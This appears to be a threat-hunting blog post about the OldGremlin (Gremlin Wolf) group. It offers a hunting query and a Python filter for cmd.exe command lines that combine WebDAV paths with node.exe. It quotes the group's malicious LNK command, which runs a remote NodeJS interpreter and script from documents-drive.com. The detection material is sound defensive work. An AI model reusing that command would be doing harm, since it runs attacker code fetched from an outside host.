105. Hunting for Gremlin Wolf (OldGremlin)
Hello everyone! Let's look at another activity cluster - Gremlin Wolf (also known as OldGremlin). This is one of my favorite adversaries, and recently I spotted another campaign, so I decided to share some detection and hunting opportunities.
The adversary distributes malicious LNK files, for example, this one. It's used to fetch and open a decoy document from a remote WebDAV server, as well as to fetch a NodeJS interpreter from the same server and run a malicious JS script with it:
cmd.exe /c start /B \\documents-drive.com\DavWWWRoot\DIADOC_Akt_sverki-04.25.docx & start /B \\documents-drive.com\DavWWWRoot\node.exe \\documents-drive.com\DavWWWRoot\index.txt
To hunt for such activity, I would focus on the WebDAV path (DavWWWRoot) and the NodeJS interpreter (node.exe) appearing together in a cmd.exe command line, so the hunting query may look like this:
event_type: "processcreatewin"
AND
proc_file_name: "cmd.exe"
AND
cmdline: ("DavWWWRoot" AND "node.exe")
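The same logic as the hunting query above, applied to process-creation events offline, as an added example (not part of the original post). It assumes events arrive as dictionaries with the query's field names (event_type, proc_file_name, cmdline); the first sample cmdline is the one shown in the post, the other samples are constructed to show what the query should not match, and the WebDAV host extraction is an extra pivot to collect the servers involved.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample events shaped like the hunting query's fields.
# The first cmdline is the one quoted in the post; the rest are constructed
# negatives that a hunt on "DavWWWRoot" AND "node.exe" under cmd.exe must skip.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {
        "event_type": "processcreatewin",
        "proc_file_name": "cmd.exe",
        "cmdline": (
            "cmd.exe /c start /B \\\\documents-drive.com\\DavWWWRoot\\DIADOC_Akt_sverki-04.25.docx "
            "& start /B \\\\documents-drive.com\\DavWWWRoot\\node.exe "
            "\\\\documents-drive.com\\DavWWWRoot\\index.txt"
        ),
    },
    {   # constructed: node.exe run from a local install, no WebDAV path
        "event_type": "processcreatewin",
        "proc_file_name": "cmd.exe",
        "cmdline": "cmd.exe /c \"C:\\Program Files\\nodejs\\node.exe\" build.js",
    },
    {   # constructed: WebDAV document opened, but no node.exe
        "event_type": "processcreatewin",
        "proc_file_name": "cmd.exe",
        "cmdline": "cmd.exe /c start \\\\fileserver.example\\DavWWWRoot\\report.docx",
    },
    {   # constructed: both strings present, but the process is not cmd.exe
        "event_type": "processcreatewin",
        "proc_file_name": "explorer.exe",
        "cmdline": "explorer.exe \\\\documents-drive.com\\DavWWWRoot\\node.exe",
    },
]

# Host part of a UNC path that goes through the WebDAV redirector (\\host\DavWWWRoot\...).
UNC_WEBDAV_HOST_RE = re.compile(r"\\\\([A-Za-z0-9.\-]+)\\DavWWWRoot", re.IGNORECASE)


def matches_hunt(event: Dict[str, str]) -> bool:
    """Equivalent of the query: process creation, image cmd.exe,
    command line containing both DavWWWRoot and node.exe (case-insensitive)."""
    cmdline = event.get("cmdline", "").lower()
    return (
        event.get("event_type", "").lower() == "processcreatewin"
        and event.get("proc_file_name", "").lower() == "cmd.exe"
        and "davwwwroot" in cmdline
        and "node.exe" in cmdline
    )


def webdav_hosts(cmdline: str) -> List[str]:
    """Unique WebDAV server names referenced in the command line, for pivoting."""
    return sorted({host.lower() for host in UNC_WEBDAV_HOST_RE.findall(cmdline)})


def hunt(events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return the matching events together with the WebDAV hosts they reference."""
    hits = []
    for event in events:
        if matches_hunt(event):
            hits.append({
                "cmdline": event["cmdline"],
                "webdav_hosts": webdav_hosts(event["cmdline"]),
            })
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["webdav_hosts"], hit["cmdline"])
```

Only the first sample survives the filter; the extracted host list gives you the WebDAV server to pivot on across other telemetry (DNS, proxy, WebClient service logs) when the hit turns out to be real.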
See you tomorrow!